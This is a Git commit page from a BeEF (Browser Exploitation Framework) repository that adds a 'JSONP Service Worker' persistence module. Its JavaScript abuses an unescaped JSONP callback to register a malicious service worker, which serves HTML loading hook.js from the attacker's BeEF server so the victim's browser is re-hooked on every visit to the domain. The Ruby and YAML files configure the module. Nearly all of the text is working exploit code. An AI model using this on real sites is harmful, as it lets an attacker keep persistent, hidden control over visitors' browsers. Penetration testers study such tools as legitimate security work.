Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first POC working

Browse Source
This commit is contained in:
ccontin
2017-04-03 15:49:19 +12:00
parent b039b4a1d1
commit 32454004e2
3 changed files with 41 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
modules/persistence/jsonp_service_worker/command.js Normal file
View File

@@ -0,0 +1,12 @@
//
// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var scriptElem = document.createElement("script");
scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27%3Cscript%20src%3D%5C%27http%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%2Fhook.js%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
$j("body").append(scriptElem);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
});

16
modules/persistence/jsonp_service_worker/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
jsonp_service_worker:
enable: true
category: "Persistence"
name: "JSONP Service Worker"
description: "This module will exploit an unescaped callback parameter in a JSONP endpoint (of the same domain compromized) to ensure that BeEF will hook every time the user revisits the domain"
authors: ["clod81"]
target:
working: ["C"]
not_working: ["S", "FF", "IE"]

13
modules/persistence/jsonp_service_worker/module.rb Normal file
View File

@@ -0,0 +1,13 @@
class Jsonp_service_worker < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
end
def self.options
return [
{'name' => 'JSONPPath', 'ui_label' => 'Path of the current domain compromized JSONP endpoint (ex: /jsonp?callback=)', 'value' => '/jsonp?callback='}
]
end
end